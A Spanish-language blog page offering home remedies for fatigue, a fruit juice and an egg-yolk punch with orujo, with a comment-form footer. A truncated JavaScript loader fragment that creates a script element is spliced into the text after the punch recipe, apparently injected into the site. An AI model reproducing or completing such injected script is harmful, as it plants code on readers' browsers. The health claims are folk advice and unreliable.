Salud y belleza » Medicina

Medicina casera para ganarle a la fatiga (I)

Sin Comentarios

Aunque muchos -especialmente los holgazanes- puedan utilizar esto como una simple excusa, la fatiga también puede deberse a factores externos. Es decir, esta existe incluso como un síntoma (al igual que cualquier otro) y no solo como una característica.

Claro que, con los remedios naturales que presentamos a continuación, todos ellos listos para usarse en contra de la fatiga, se acabaron las excusas.

Remedios caseros contra la fatiga

Zumo revitalizador

Ingredientes: un par de tazas de uvas verdes, algunos guineos pequeños bien maduros, cuatro, naranjas peladas, unas pocas rodajas finas de lima, dos ramas de menta.

Procedimiento: la elaboración es sumamente sencilla, solo basta agregar todas las frutas en una licuadora para, luego, verter el zumo en un recipiente (no metálico: así no se pierden las vitaminas). Beber frío.

Ponche energizante

Ingredientes: un par de yemas de huevo, dos cucharadas de azúcar, algunas gotas de esencia de vainilla, cien mililitros de orujo.

Procedimiento: solo es necesario poner todos los elementos, juntos, en un recipiente y revolver durante cinco minutos; para quienes no les gusta el alcohol puede utilizar leche en lugar de orujo.var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.